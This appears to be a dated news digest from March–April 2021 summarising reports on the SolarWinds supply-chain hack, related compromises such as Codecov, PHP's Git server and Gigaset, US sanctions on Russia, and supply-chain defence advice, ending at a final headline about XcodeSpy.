Responding to sanctions imposed by the US government, Russia-headquartered cybersecurity company Positive Technologies (PT) has denied any wrongdoing, and dismissed the claims as “groundless accusation”. Last week, the US Department of the Treasury imposed sanctions on several Russian technology firms, including PT, accusing them of helping Russian state actors to conduct cyberattacks against the West.

Ref - TechRadar 

_______________________________________________________________________________________

(April 19, 2021)


XCSSET malware now targeting Apple's M1-based Macs

A Mac malware campaign targeting Xcode developers has been retooled to add support for Apple's new M1 chips and expand its features to steal confidential information from cryptocurrency apps. XCSSET continues to abuse the development version of the Safari browser to plant JavaScript backdoors to websites via Universal Cross-site Scripting (UXSS) attacks.


_______________________________________________________________________________________

(April 19, 2021)


Codecov hack could be another SolarWinds-type attack

US federal authorities are investigating a security breach suffered by software auditing company Codecov. According to a statement put out by the San Francisco-based firm, an unscrupulous user broke through its digital defenses and modified its Bash Uploader script. While Codecov has emailed all affected users, the nature of the changes to the script potentially puts thousands of customers at risk.

Ref - Techradar

_______________________________________________________________________________________

(April 19, 2021)


Zero-trust is the best defense against third-party attacks

Adopting a zero-trust security strategy can better safeguard organizations against third-party attacks, where suppliers should not simply be entrusted to do the right thing. The Acronis CEO believed third-party attacks such as those involving Accellion and Singapore Airlines (SIA) could have been prevented with a zero-trust architecture. Zero trust isn't just about not trusting anyone, it's about personal cyber hygiene.

Ref - ZDNet

_______________________________________________________________________________________

(April 19, 2021)


Next SolarWinds crisis could happen very soon

The SolarWinds cyber attack, which saw around 100 companies and 9 US federal agencies compromised, isn’t one to be treated as an isolated incident. It is rather a stark warning of what is about to come if decisive action isn’t taken. The vice-president and chief information security officer at Hitachi Vantara discuss how companies can avoid a similar supply-chain crisis.


_______________________________________________________________________________________

(April 17, 2021)


SolarWinds hacking campaign puts Microsoft in the hot seat

Microsoft has offered all federal agencies a year of “advanced” security features at no extra charge. Microsoft also removed names of several Russian IT companies, including Positive Technologies, from a list to whom Microsoft supplied the early access to data on vulnerabilities detected in its products.

Ref - Yahoo 

_______________________________________________________________________________________

(April 17, 2021)


Six out of 11 EU agencies running Solarwinds Orion software were hacked

CERT-EU confirmed that 14 EU agencies were running the SolarWinds Orion monitoring software, and six of them were breached. Anyway, the CERT-EU did not reveal the name of the EU agencies that installed the tainted Orion updates. CERT-EU said that some agencies sent limited details on the attacks, and, while in other reports, network logs, used to hunt for clues about the hackers’ actions, were often not available.


_______________________________________________________________________________________

(April 17, 2021)


Biden upends U.S. convention on cyber espionage

President Biden’s decision to punish Russia for the SolarWinds hack broke with years of U.S. foreign policy that has tolerated cyber espionage as an acceptable form of 21st-century spycraft. It also said U.S. intelligence had “high confidence” that Russia’s foreign intelligence service, the SVR, was behind last year’s SolarWinds hack, which compromised at least nine federal agencies and about 100 private-sector organizations.


_______________________________________________________________________________________

(April 16, 2021)


Commerce Dept. may have found SolarWinds backdoor in Aug. 2020

Last month, Microsoft and FireEye identified that file as a newly-discovered fourth malware backdoor used in the sprawling SolarWinds supply chain hack. FireEye refers to the backdoor as “Sunshuttle,” whereas Microsoft calls it “GoldMax.” A search in VirusTotal’s malware repository shows that on Aug. 13, 2020, someone from the National Telecommunications and Information Administration (NTIA), a division of the U.S. Commerce Department, had
 uploaded a file with that same name and file hashes.


_______________________________________________________________________________________

(April 16, 2021)


More countries officially blame Russia for SolarWinds attack

The United Kingdom, Canada, the European Union, and NATO have expressed support for the United States in blaming Russia for the cyberattack on IT management company SolarWinds, which impacted organizations worldwide. The announcements were made the same day that the United States expelled 10 Russian diplomats and sanctioned dozens of companies and people.


_______________________________________________________________________________________

(April 16, 2021)


The untold story of the SolarWinds hack

Hackers believed to be directed by the Russian intelligence service, the SVR, used the routine software update to slip malicious code into Orion's software and then used it as a vehicle for a massive cyberattack against America. The concern is that the same access that gives the Russians the ability to steal data could also allow them to alter or destroy it.

Ref - NPR 

_______________________________________________________________________________________

(April 15, 2021)


The U.S. imposes sanctions on Russia over cyber-attacks

The US has announced sanctions against Russia in response to what it says are cyber-attacks and other hostile acts. The measures, which target dozens of Russian entities and officials, aiming to deter Russia's harmful foreign activities. The statement says Russian intelligence was behind last year's massive SolarWinds hack and accuses Moscow of interference in the 2020 election.
 
Ref - BBC

_______________________________________________________________________________________

(April 15, 2021)


Codecov Bash Uploader tool compromised in supply chain hack

At the beginning of April, security professionals at Codecov learned that someone had gained unauthorized access to their Bash Uploader script and modified it without permission. The actor gained access because of an error in Codecov’s Docker image creation process that allowed the actor to extract the credential required to modify the Bash Uploader script.


_______________________________________________________________________________________

(April 15, 2021)


Biden unveiled Russia sanctions over SolarWinds hack 

Ten Russian diplomatic officials are to be expelled from the US and up to 30 entities will be blacklisted in the largest round of sanctions action against Russia of Joe Biden’s presidency. The US is set to announce new sanctions against Russia as soon as Thursday in retaliation for Moscow’s interference in elections, alleged bounties on US soldiers in Afghanistan, and cyber-espionage campaigns such as the SolarWinds hack, according to reports in US and international media.


_______________________________________________________________________________________

(April 14, 2021)


The misuse of X.509 certificates & keys in SolarWinds hack

A report described the misuse of X.509 certificates and keys in the SolarWinds attack and how Cryptomathic CKMS and CSG could help protect against such attacks. While multiple failures led to the attack, one of the most glaring failures was that the attackers could misuse X.509 certificates and keys to forge and undermine trust. 


_______________________________________________________________________________________

(April 14, 2021)


Advanced supply chain attacks need a strategic counter-defense policy

Enterprise CIOs and CISOs in government and the private sector are still assessing the full impact of the advanced supply chain attacks uncovered in recent months. The fact of the matter here is that cyber is where the new wars are being fought and supply chain attacks are a winning playbook for the state-sponsored attackers.


_______________________________________________________________________________________

(April 14, 2021) 


Sunburst hack costs SolarWinds at least $18M

SolarWinds disclosed that it took a hit of at least $18 million from the massive Russian malware attack that compromised its flagship Orion technology management software. In releasing preliminary first-quarter results, SolarWinds said it spent $18 million to $19 million to investigate and remediate the cyber incident, related legal and other professional services, and consulting services provided to customers at no charge.

Ref - CFO

_______________________________________________________________________________________

(April 13, 2021)


A macOS malware is hidden into the NPM package supply chain

A new malicious package has been spotted on the npm registry, which targets NodeJS developers using Linux and Apple macOS operating systems. The malicious package is called "web-browserify," and imitates the popular Browserify npm component downloaded over 160 million times over its lifetime.


_______________________________________________________________________________________
 
(April 13, 2021) 


U.S. intelligence community details growing influence threats in wake of SolarWinds attacks

The intelligence community made its most direct public attribution yet that Russia was behind weaving malicious code into a SolarWinds software update to facilitate a sweeping espionage operation, impacting hundreds of companies and U.S. federal agencies. The readout does not specify whether Biden specifically discussed SolarWinds with his Russian counterpart.

Ref - CyberScoop 

_______________________________________________________________________________________

(April 13, 2021) 


Spy Chiefs to warn of threats from SolarWinds to North Korea

Biden’s intelligence team -- including Director of National Intelligence Avril Haines and CIA Director William Burns -- is under increasing pressure to respond to a widening series of national security threats while defending the administration’s continuing reviews and policy approaches even as it nears the 100-day mark in office.

Ref - Bloomberg

_______________________________________________________________________________________

(April 13, 2021) 


Detecting the next SolarWinds-Style cyberattack

Developing SIEM rules, using the SolarWinds attack as an example, can help in the detection of the next SolarWinds-like attack. Sigma rules can be used as a sort of a common language to create and share quality queries regardless of the SIEM any organization uses. This will enable Security Operations teams to build out the elements needed to detect future attacks. The same Sigma Rule can be used across multiple SIEM, including Splunk, Qradar, and Azure Sentinel.

_______________________________________________________________________________________

(April 12, 2021)


SolarWinds hack underscores the need for moving to the cloud

According to Microsoft CEO Satya Nadella, the SolarWinds attack underscores the importance of implementing zero trust architecture and migrating to the cloud. Nadella sees the SolarWinds hack as a wake-up call for all companies to take security as a first-class priority.

Ref - CRN

_______________________________________________________________________________________

(April 12, 2021)


Biden names former top NSA officials to two key cyber roles

President Biden has appointed former National Security Agency (NSA) deputy director Chris Inglis and former deputy for counterterrorism at the NSA Jen Easterly to two top cyber roles in the administration. The appointments come as the White House is still dealing with the fallout over the SolarWinds cyber attack, which infiltrated multiple federal agencies.

Ref - Axios
 
_______________________________________________________________________________________

(April 10, 2021)


APKPure users targeted via a supply chain attack

APKPure, one of the largest alternative app stores, was the victim of a supply chain attack, threat actors compromised client version 3.17.18 to deliver malware. The app store is available only on devices that use Google Mobile Services (GMS) and are firmly tied to Google’s infrastructure. The tainted client downloads and installs various apps, including other malicious payloads.


_______________________________________________________________________________________

(April 9, 2021)


Stopping or preventing the next SolarWinds breach 

Mitigating the next SolarWinds breach will require more cyber-savvy people to assess and recognize those threats, explain their potential impact and advocate for enterprise-wide investment in the appropriate levels of protection. Additionally, it will require more boots on the ground in a field that has evolved to encompass a growing array of sub-areas and rapidly changing technologies.


_______________________________________________________________________________________

(April 9, 2021)


Gigaset devices laced with malware in a latest supply chain attack 

Cybercriminals managed to sneak several malicious apps onto Gigaset Android devices by compromising a server belonging to an external update service provider. The models affected, according to Malwarebytes, including the Gigaset GS270 and GS160, Siemens GS270 and GS160, all running Android 8, as well as the Alps P40pro, running Android 9, and S20 pro+, running Android 10.

Ref - IT Pro

_______________________________________________________________________________________

(April 9, 2021)


Supply chain disruptions lead to the loss of trillions of dollars

Supply chain disruptions in 2020 had a real impact on the bottom line, as companies lost trillions of dollars in revenue, according to the report, with 64% of respondents reporting revenue losses between 6% and 20%. The recent survey indicated that the disruptions caused a big hit in brand reputation, with 38% of respondents reporting that their brands had been impacted. Many respondents said that their struggles to maintain supplies of goods and services left customers frustrated.


_______________________________________________________________________________________

(April 9, 2021)


What the Titans of Industry Reveal about SolarWinds Attack

During the testimony, it was outlined how the SolarWinds software was hijacked and used to break into a host of other organizations, and that the hackers had been able to read Microsoft’s source code for user authentication. Unfortunately for Microsoft, and strongly pointed out by CrowdStrike, the data hackers took advantage of well-known vulnerabilities in their Windows authentication and active directory federation services.


 _______________________________________________________________________________________

(April 9, 2021)


How to protect against software supply-chain attacks

Organizations can protect themselves against supply-chain attacks with some simple tips. They should avoid the use of third-party modules, watch for threats when using modules by unknown authors, and perform automated scans of code submitted in repositories. They can also Have a plan for external services and develop an on-premises and cloud strategy.

Ref - SCMagazine 

_______________________________________________________________________________________

(April 8, 2021)


CISA releases tool to review Microsoft 365 post-compromise activity

CISA has released a new tool, dubbed Aviary, that can help security teams visualize and analyze data outputs generated using Sparrow, an open-source PowerShell-based tool for detecting potentially compromised applications and accounts in Azure and Microsoft 365. Sparrow was created to help defenders hunt down threat activity after the SolarWinds supply-chain attack.


_______________________________________________________________________________________

(April 8, 2021)


How to minimize cyberattacks on supply and value chains

Organizations can mitigate access-related third-party risk in several ways. This includes providing an identity to anything connecting to the enterprise, including people, systems, and things. Another way is taking advantage of identity broker technology to verify credentials and enrich authentication requirements. Accessing governance for third-party identities and centrally managing all third-party access can also help minimize the risks.


_______________________________________________________________________________________

(April 8, 2021)


Biden administration sets the stage for retaliation against Russia over SolarWinds attack

The Biden administration completed an intelligence review of alleged Russian meddling in the SolarWinds cybersecurity attack and interference in US elections. The review could set the stage for possible retaliatory actions like enacting sanctions or expulsion of Russian intel officers in the US.

Ref - Yahoo 

_______________________________________________________________________________________

(April 7, 2021)


In another supply chain incident, Gigaset injects malware into victims' phones

Android smartphones from Gigaset have been infected by malware directly from the manufacturer in what appears to be a supply-chain attack. The Trojan, once downloaded and installed on a victim's device via a poisoned software update from the vendor, is capable of opening browser windows, fetching more malicious apps, and sending people text messages to further spread the malware.

Ref - The Register 

_______________________________________________________________________________________

(April 7, 2021)


Supply?chain attacks - When trust goes wrong

Minimizing the risk of a supply-chain attack involves a never-ending loop of risk and compliance management. In the SolarWinds hack, the post-attack in-depth inspection of the third-party vendor’s product identified the exploit buried deep in the code. As a preventive measure, organizations need to have visibility into all of their suppliers and the components they deliver, which includes the policies and procedures that the company has in place.


_______________________________________________________________________________________

(April 6, 2021)


Senators press for more on SolarWinds hack after AP report

Key lawmakers said they're concerned they've been kept in the dark about what suspected Russian hackers stole from the federal government and they pressed Biden administration officials for more details about the scope of what's known as the SolarWinds hack.


 _______________________________________________________________________________________

(April 6, 2021)


RSA Conference 2021 will have a keynote from SolarWinds’s president

RSA Conference announced that Sudhakar Ramakrishna, President of SolarWinds, has joined the keynote line-up for RSA Conference 2021. He will be joined by Laura Koetzle to explore the technical elements of the breach and will provide a deep understanding of the sophistication of the overall operation of the nation-state attack.


_______________________________________________________________________________________

(April 5, 2021)


SolarWinds type attacks need a serious approach toward cybersecurity 

The federal government has to take cybersecurity more seriously, both from a funding and a legislation standpoint after the SolarWinds breach. There is some hope that this will happen with the new administration, but it remains to be seen if talk will turn into action and real change. Only with a concerted effort across all levels of government, big to small, national/state to local, will we be able to overcome this cyber assault and keep our citizens safe and secure.

Ref - GovTech

_______________________________________________________________________________________

(April 5, 2021)


The cybersecurity warning system in the U.S.

Many vulnerabilities and threats aren’t discovered by the government but are regularly uncovered by hackers who find bugs, notify companies, and often work with them to develop fixes. In turn, CISA can immediately issue directives, as it did during SolarWinds and the Microsoft Exchange compromise, that mandate action for federal agencies and sound the clarion call for others to heed.


_______________________________________________________________________________________

(April 2, 2021)


The importance of supply chain risk management

With cloud and digital technology allowing companies to flourish and succeed globally, the world has never been more interconnected. However, this comes with elevated risk. Partners, vendors, and third parties can expose companies and malicious hackers are known to target organizations through their supply chain. As a result, supply chain risk management has become a critical component of any company’s risk management and cybersecurity strategy.

Ref - Varonis

_______________________________________________________________________________________

(April 2, 2021)


The positive outcome from the SolarWinds breach

The SolarWinds compromise may have some positive outcomes by shining an even harsher light on the complacency that still exists when it comes to security. It is important especially for the different security standards that are applied to development/supplier systems compared to in-house production systems. Now, securing the supply chain has become a hot topic, and organizations can do better to protect their infrastructure.

Ref - BMC

_______________________________________________________________________________________

(April 2, 2021)


How Russian hackers targeted US cyber first responders in SolarWinds breach

After infiltrating US government computer networks early last year as part of the SolarWinds data breach, Russian hackers then turned their attention to the very people whose job was to track them down. The hackers identified a handful of key cybersecurity officials and analysts who would be among the first to respond once the hack was detected, so-called 'threat hunters,' and attempted to access their email accounts.

Ref - CNN 

_______________________________________________________________________________________

(April 1, 2021)


After the hack, officials draw attention to supply chain threats

The National Counterintelligence and Security Center warned that foreign hackers are increasingly targeting vendors and suppliers that work with the government to compromise their products in an effort to steal intellectual property and carry out espionage. The NCSC said it is working with other agencies, including the CISA to raise awareness of the supply chain issue.
Ref - AP News 

_______________________________________________________________________________________

(April 1, 2021)


Learnings from the SolarWinds supply chain attack

The recent SolarWinds attack (known as Sunburst) has shone a light on the controls required after a breach, with affected organizations laser-focused on what happened and what next. But the same controls that can help remediate the risks posed by this serious supply chain threat can also help prevent or limit the effect of this and other attacks before they happen.

Ref - Accenture

_______________________________________________________________________________________

(April 1, 2021)


The U.S. officials are drawing attention to the supply chain attacks

The U.S. government is working to draw attention to supply chain vulnerabilities, an issue that received particular attention late last year after suspected Russian hackers gained access to federal agencies and private corporations by sneaking malicious code into widely used software. The NCSC said it plans to issue guidance throughout the month about how specific sectors, like health care and energy, can protect themselves.


_______________________________________________________________________________________

(April 1, 2021)


The SolarWinds hack severity perception increased over time

(ISC)² has published the results of an online survey of 303 cybersecurity professionals on the SolarWinds Orion software breach. In which, 86% of respondents rated the breach “very” or “extremely severe” when they first learned about it. However, roughly six weeks after the incident was reported, as more details emerged, the number of respondents who indicated that the breach was “severe” increased from 51% to 55%.


_______________________________________________________________________________________

(April 1, 2021)


A report with detailed analysis of SolarWinds hacking tools

US Cyber Command and the Department of Homeland Security (DHS) are preparing to release a detailed analysis of the hacking tools used in the SolarWinds attack, which targeted multiple federal agencies and private firms last year. The report was originally scheduled to be released on Wednesday, but the DHS delayed it without explanation. However, it's still expected to be published soon.

Ref - Computing

_______________________________________________________________________________________

(April 1, 2021)


DHS chief announces cybersecurity plan in wake of SolarWinds attacks

Homeland Security Secretary Alejandro Mayorkas warned that cyber threats are coming dangerously close to threatening people’s lives as he announced a series of sprints designed to counter online attacks. The series includes 60-day sprints, each focused on the most important and most urgent priorities needed to achieve goals.

Ref - Yahoo

_______________________________________________________________________________________

(March 31, 2021)


The SolarWinds breach is a wake-up call for the security community

The next time a SolarWinds-class attack occurs, the steps toward a successful response are already defined. As it includes, understanding potential concentration risks may involve delving into third-party liabilities and obligations, or categorizing vendors, and understanding the scope of the larger supplier ecosystem. By defining potential sources of this risk, it becomes possible to build mitigation strategies into incident response plans. 

Ref - Deloitte

_______________________________________________________________________________________

(March 30, 2021)


Executive order with 'a dozen' actions forthcoming after SolarWinds, Microsoft breaches

The Biden administration is working on “close to a dozen” action items to be included in an upcoming executive order meant to strengthen federal cybersecurity in the wake of two major breaches. The comments were made as the Biden administration continues to grapple with the fallout from both the recent attacks.

Ref - TheHill 

_______________________________________________________________________________________

(March 30, 2021)


Infosec community is concerned about SolarWinds hack

The severity of a data breach typically jumps in the short term and decreases as time progresses. But, according to a survey by International Information System Security Certification Consortium, or (ISC)2, the 2020 SolarWinds incident bucked that trend in the eyes of cybersecurity professionals. A month and a half after the incident was reported, the number of respondents who indicated the breach was “severe” increased from 51% to 55%.


_______________________________________________________________________________________

(March 30, 2021)


Details about the second elusive attack targeting SolarWinds software

Details about the scope and victims of Supernova, which exploited a flaw in SolarWinds' Orion network management software, so far have been scarce. Less than a handful of victims have been known to be targeted, and an investigation into the breach of one of those victims led to researchers at Secureworks tying the Supernova attacks to a previously unknown Chinese nation-state group they dubbed "Spiral."


_______________________________________________________________________________________

(March 30, 2021)


SolarWinds breach lead to distrust of software in use 

Security experts say because enterprises can't inspect the inner workings of the software they buy, they're at the mercy of software companies' security practices. In SolarWind attacks, attackers infected the software that is trusted by organizations. And that software became a way to steal confidential information. This breach of trust of software is huge because software is driving everything around tech firms.


_______________________________________________________________________________________

(March 30, 2021)


Trump administration emails were compromised in SolarWinds breach

An Associated Press report found that the head of DHS and the department's cyber-security staff were among the accounts exposed during the SolarWinds hack. Email accounts belonging to members of the Trump administration's Department of Homeland Security, including the head of the department, were reportedly compromised by suspected Russian hackers, according to the report.

Ref - Yahoo

_______________________________________________________________________________________

(March 29, 2021)


Key lessons from Sunburst

The cyber domain is a realm of intense interconnectivity that underpins much of daily life and national security. The discovery late in 2020 that Sunburst malware had infected not only thousands of private networks but also US government agencies, led some spectators to embrace alarmist views of this event as the first step in a full-fledged cyberwar.


_______________________________________________________________________________________

(March 29, 2021)


PHP's Git server hacked in a recent supply chain attack

In the latest software supply chain attack, the official PHP Git repository was hacked and the code base tampered with. Two malicious commits were pushed to the php-src Git repository maintained by the PHP team on their git.php.net server. The threat actors had signed off on these commits as if these were made by known PHP developers and maintainers, Rasmus Lerdorf and Nikita Popov.


_______________________________________________________________________________________

(March 29, 2021)


SolarWinds breach got emails of top DHS officials

Suspected Russian hackers gained access to email accounts belonging to the Trump administration’s head of the Department of Homeland Security and members of the department’s cybersecurity staff whose jobs included hunting threats from foreign countries. The intelligence value of the hacking of then-acting Secretary Chad Wolf and his staff are not publicly known.

Ref - AP News

_______________________________________________________________________________________

(March 29, 2021)


Need of a new alert system for cybersecurity

America needs a national cyber vulnerability early warning center after the recent SolarWinds breach. Just as a meteorologist is constantly on the lookout for storm systems, an early warning center would search widely used software and hardware components for vulnerabilities. It would discover new weaknesses before opponents, fortifying defenses and increasing the costs of mounting an attack.


_______________________________________________________________________________________

(March 29, 2021)


SolarWinds patches four new vulnerabilities in the Orion platform

SolarWinds released fixes for four new vulnerabilities in their Orion platform, the most severe of which is an authenticated remote code execution flaw due to a JSON deserialization weakness. Fixes for these weaknesses are in Orion Platform 2020.2.5.

Ref - Rapid7 

_______________________________________________________________________________________

(March 26, 2021)


SolarWinds hackers copied a limited number of source code repositories - Mimecast

A forensic investigation conducted by Mimecast and FireEye Mandiant incident response division found that SolarWinds hackers downloaded a limited number of the company’s source code repositories.

Ref - CPO Magazine 

_______________________________________________________________________________________

(March 26, 2021)


Software security is the top priority - SolarWinds CEO

SolarWinds has launched a Secure by Design initiative in response to the recent cybersecurity attack. This project is designed to build security into the design phase of software development and to make security an ongoing priority instead of an after-the-fact priority. The company is testing a design process that uses several parallel build chains simultaneously to create software instead of just one. 

Ref - TechRepublic 

_______________________________________________________________________________________

(March 26, 2021)


Lessons learned from the SolarWinds breach

A system like SolarWinds should have security checks built in from the start and the use of software signing keys should always be closely monitored. In addition, organizations need to adopt a zero-trust policy, stay vigilant, and create a security culture to prevent complex attacks like this.

Ref - Forbes

_______________________________________________________________________________________

(March 25, 2021)


Strategies to guard against email fraud in supply chain

Proofpoint has provided six recommendations to protect supply chain relationships: knowing who the suppliers are, considering the "spider web," creating more vendor accountability, being responsive to security-conscious users, relying more on automation, and finally implementing DMARC at the gateway.


_______________________________________________________________________________________

(March 25, 2021)


SolarWinds breach - Key learnings

Security experts identified several critical learnings from SolarWinds breach: Threat hunting and threat intelligence built on artificial intelligence and machine learning; Comprehensive detection with real-time continuous monitoring; Simplified incident response infrastructure that is capable of detecting attacks, containing the damage, and restoring systems and data; Agile, integrated, and automated security technology; Dynamic remediation strategies designed to quickly return business operations to a trusted state

Ref - OpenText

_______________________________________________________________________________________

(March 25, 2021)


Fed breach disclosure rule after SolarWinds breach

An executive order in the wake of the SolarWinds hack will require software vendors and service providers to notify their U.S. government clients if they experience a security breach. Major software companies like Microsoft and Salesforce that sell to the government would be affected by the executive order.

Ref - CRN

_______________________________________________________________________________________

(March 25, 2021)


Fresh code execution flaws in the Solarwinds Orion platform

Solarwinds has shipped a major security update to fix at least four documented security vulnerabilities, including a pair of bugs that are exploited for remote code execution attacks. The patches were pushed out as part of a minor security makeover of the Orion Platform, the same compromised Solarwinds product that was exploited in recent nation-state software supply chain attacks.


_______________________________________________________________________________________

(March 25, 2021)


SolarWinds making changes in the build process after the hack

SolarWinds’ chief executive said the software provider made a series of changes to its build process and board room reporting structure in an effort to prevent another supply chain attack like the one experienced by the company. The company is also taking a series of actions designed to boost the profile of cybersecurity in business decisions and increase the autonomy of its chief information security officer and CIO shops.

Ref - SC Media

_______________________________________________________________________________________

(March 25, 2021)


Some powerful tactics to prevent supply chain attacks

Upguard recommends some defense tactics that organizations can implement to significantly decrease the chances of a supply chain attack. This includes implementing Honeytokens, securing privileged access management, implementing a Zero-Trust architecture, and assuming a breach mindset when preparing the security strategy.

Ref - Upguard 

_______________________________________________________________________________________

(March 25, 2021)


‘Trust no one’ becomes cyber mantra after massive hacking attacks

In the wake of two massive cyberattacks that exposed glaring deficiencies in U.S. defenses, government officials and cybersecurity practitioners are saying zero-trust may be the way to stop the cyber mayhem. Zero-trust reduces or prevents lateral movement and privilege escalation.

Ref - JapanTimes 

_______________________________________________________________________________________

(March 24, 2021)


Securing the software development build using secure design

SolarWinds SVP, Engineering Lee McClendon, KPMG Director of Cyber Security Services Caleb Queern, and Head Geek Thomas LaRock provide insights on how SolarWinds is prioritizing security in its software build environment, and what the entire industry can learn about next-generation software development.

Ref - SolarWinds 

_______________________________________________________________________________________

(March 24, 2021)


SolarWinds attack and other threats indicate increased nation-state activity

Cyber attacks launched by nation-states are becoming more proficient and aggressive. This was the message from Admiral (ret.) Michael S. Rogers at the NetDiligence Cyber War Webinar Series. He said that the breadth of activity has now changed with the SolarWinds attack in December 2020 and the attack on Microsoft Exchange this month, both arguable evidence of increased nation-state activity.

Ref - Yahoo

_______________________________________________________________________________________

(March 23, 2021)


Attackers can abuse OAuth authentication apps used in the SolarWinds breach

Given the broad permissions they can have to your core cloud applications, OAuth apps have become a growing attack surface and vector. Attackers use various methods to abuse OAuth apps, including compromising app certificates, which was also used in the SolarWinds / Solorigate campaign. Attackers can use OAuth access to compromise and take over cloud accounts. Until the OAuth token is explicitly revoked, the attacker has persistent access to the user’s account and data. 


_______________________________________________________________________________________

(March 23, 2021)


SolarWinds breach is one of the most challenging hacking incidents

The recent SolarWinds Senate hearing and a flurry of subsequent briefings have unearthed new questions around the attack. The acting director of the U.S. Cybersecurity and Infrastructure Agency (CISA) Brandon Wales has called it the most complex and challenging hacking incident the agency has come up against.

Ref - CyberArk

_______________________________________________________________________________________

(March 23, 2021)


Microsoft proposes incentivizing digital solutions to mitigate supply chain risk

The first step in strengthening supply chain security is to carefully identify the risks. Once those risks are identified, the industry can then work with the government to define risk-mitigating best practices and tailored technology-enabled solutions. Technology may not eliminate the need for more traditional restrictive measures in all contexts. But in many areas, technology-enabled solutions can both strengthen security and sustain tech leadership.

Ref - Microsoft  

_______________________________________________________________________________________

(March 22, 2021)


The ‘Frankencloud’ model is the biggest security risk

According to a researcher, the information technology environments evolve into the “Frankenstein” approach. Firms scrambled to take advantage of the cloud while maintaining their systems of record. This led to systems riddled with complexity and disconnected parts put together.

Ref - TechCrunch

_______________________________________________________________________________________

(March 22, 2021)


The SolarWinds victims are now solidified

Brandon Wales, the acting director of the Cybersecurity and Infrastructure Security Agency, said that the list of victims from the attack on SolarWinds Orion has "solidified" and he is not expecting many more organizations to come forward. CISA is continuing to work with federal agencies to understand if any have been compromised.

Ref - FCW

_______________________________________________________________________________________

(March 22, 2021)


A report about SilverFish cyber-espionage group

The PRODAFT Threat Intelligence Team has published a report that gives an unusually clear look at the size and structure of organized cybercrime. It uncovered a global cybercrime campaign that uses modern management methods, sophisticated tools including its own malware testing sandbox. It has strong ties with the SolarWinds attack, the EvilCorp group, and some other well-known malware campaigns.


_______________________________________________________________________________________

(March 22, 2021)


Shell is another victim of the Accellion supply chain hack

Energy giant Shell has disclosed a data breach (via Supply Chain attack) after attackers compromised the company's secure file-sharing system powered by Accellion's File Transfer Appliance (FTA). Upon learning of the incident, the firm - Shell - addressed the vulnerabilities with its service provider and cybersecurity team, and started an investigation to better understand the nature and extent of the incident.


_______________________________________________________________________________________

(March 22, 2021)


The new insider threat of compromised partners

The current rash of financial fraud and supply chain attacks exploit a seemingly unsolvable vulnerability in security strategy. Attackers exploit the fact that a firm must communicate with its outside partners and vendors to thrive as a company or an institution. As they interact with partners, the door to exploitation opens, specifically in the form of supply chain attacks. These attacks are tremendously hard to detect since malware and malicious links are not necessary for successful exfiltration.


_______________________________________________________________________________________

(March 22, 2021)


Three vulnerabilities exposed during SolarWinds attack

SolarWinds attackers leveraged three key vulnerabilities in the current IT ecosystem. They leveraged the supply chain weakness, injecting malware in the supplier network to gain access to the core network. Besides, they took advantage of single sign-on systems, and also exploited the traditional multifactor authentication systems.

Ref - CPO Magazine 

_______________________________________________________________________________________

(March 22, 2021)


In wake of SolarWinds, Exchange attacks, the U.S. government calls for better information sharing

The new cybersecurity leadership in the Biden White House is brainstorming methods to establish new early warning systems that combine traditional intelligence agency methods with private sector expertise. Reportedly chief among the new approaches is establishing more profound information-sharing methods with the private sector.

Ref - CSO Online 

_______________________________________________________________________________________

(March 22, 2021)


KPMG advisory on SolarWinds attack

According to the recent KPMG advisory, each malware used during SolarWinds had a tactical purpose. SUNSPOT was designed by the threat actor(s) to function specifically within SolarWinds’ software build environment to insert a malicious backdoor called SUNBURST. TEARDROP and RAINDROP were designed to be used by the threat actor(s) to deploy a modified version of Cobalt Strike. Further, SUNSHUTTLE/GoldMax, GoldFinder, and Sibot are malicious tools reported to have been used by threat actor(s) in an environment where there was a pre-existing SUNBURST compromise.

Ref - KPMG

_______________________________________________________________________________________

(March 21, 2021)

How to prevent supply chain attacks?

The key to mitigating supply chain security risks is to ensure each of your third-party vendors is compliant with the strictest of cybersecurity standards, whether or not regulatory requirements are enforced. Complacency is the primary impetus to supply chain attack vulnerability. To keep third-party vendors compliant, security questionnaires should be sent to each of them on a regular basis to continuously scrutinize their security posture.

Ref - UpGuard

_______________________________________________________________________________________

(March 21, 2021)


CISA releases a tool to detect SolarWinds malicious activity

The U.S. CISA has released a new tool (CISA Hunt and Incident Response Program or CHIRP) that allows detecting malicious activity associated with the SolarWinds hackers in compromised on-premises enterprise environments. It is a forensics collection tool that CISA developed to help network defenders find IOCs associated with activity detailed in the following CISA Alerts.


_______________________________________________________________________________________

(March 20, 2021)


SolarWinds is a major disaster in the modern era of computing

Researcher Davi Ottenheimer has compared the SolarWinds attack with a Dust Bowl disaster. According to him, Microsoft for so many years worked on an extremely expedited model with minimal security or ecosystem investment inviting a predictable disaster.


_______________________________________________________________________________________

(March 20, 2021)


A Swiss firm has accessed servers of a SolarWinds hacker

A Swiss cybersecurity firm says it has accessed servers used by a hacking group (Silverfish) tied to the SolarWinds breach, revealing details about who the attackers targeted and how they carried out their operation. The firm, PRODAFT, also said the hackers have continued with their campaign through this month.

Ref - ProDaft

_______________________________________________________________________________________

(March 18, 2021)


Xcode Project spreading MacOS malware to Apple developers

Cybercriminals are targeting Apple developers with a trojanized Xcode project, which once launched installs a backdoor that has spying and data exfiltration capabilities. The malicious Xcode project, which researchers call XcodeSpy, installs a variant of the known EggShell backdoor on the developer’s macOS computer. 


_______________________________________________________________________________________

(March 18, 2021)


CISA releases detection tool for SolarWinds malicious activity 

The Cybersecurity and Infrastructure Security Agency (CISA) has released a new tool to detect post-compromise malicious activity associated with the SolarWinds hackers in on-premises enterprise environments. CISA Hunt and Incident Response Program (CHIRP), the new forensics collection tool, is a Python-based tool that helps detect SolarWinds malicious activity IOCs on Windows operating systems.


_______________________________________________________________________________________

(March 18, 2021)

SolarWinds-linked threat group SilverFish took advantage of enterprise victims

A Swiss cybersecurity firm Prodaft said that SilverFish, a threat group, has been responsible for intrusions at over 4,720 private and government organizations including Fortune 500 companies, ministries, airlines, defense contractors, audit and consultancy companies, and automotive manufacturers. SilverFish has been connected to the recent SolarWinds breach as "one of many" threat groups taking advantage of the situation.

Ref - ZDNet

_______________________________________________________________________________________

(March 18, 2021)


Beware the Package Typosquatting Supply Chain Attack

Attackers are mimicking the names of existing packages on public registries in hopes that users or developers will accidentally download these malicious packages instead of legitimate ones. In this attack, the attacker tries to mimic the name of an existing package on a public registry in hopes that users or developers will accidentally download the malicious package instead of the legitimate one.


_______________________________________________________________________________________

(March 18, 2021)


XcodeSpy malware can target iOS devs in a supply chain attack

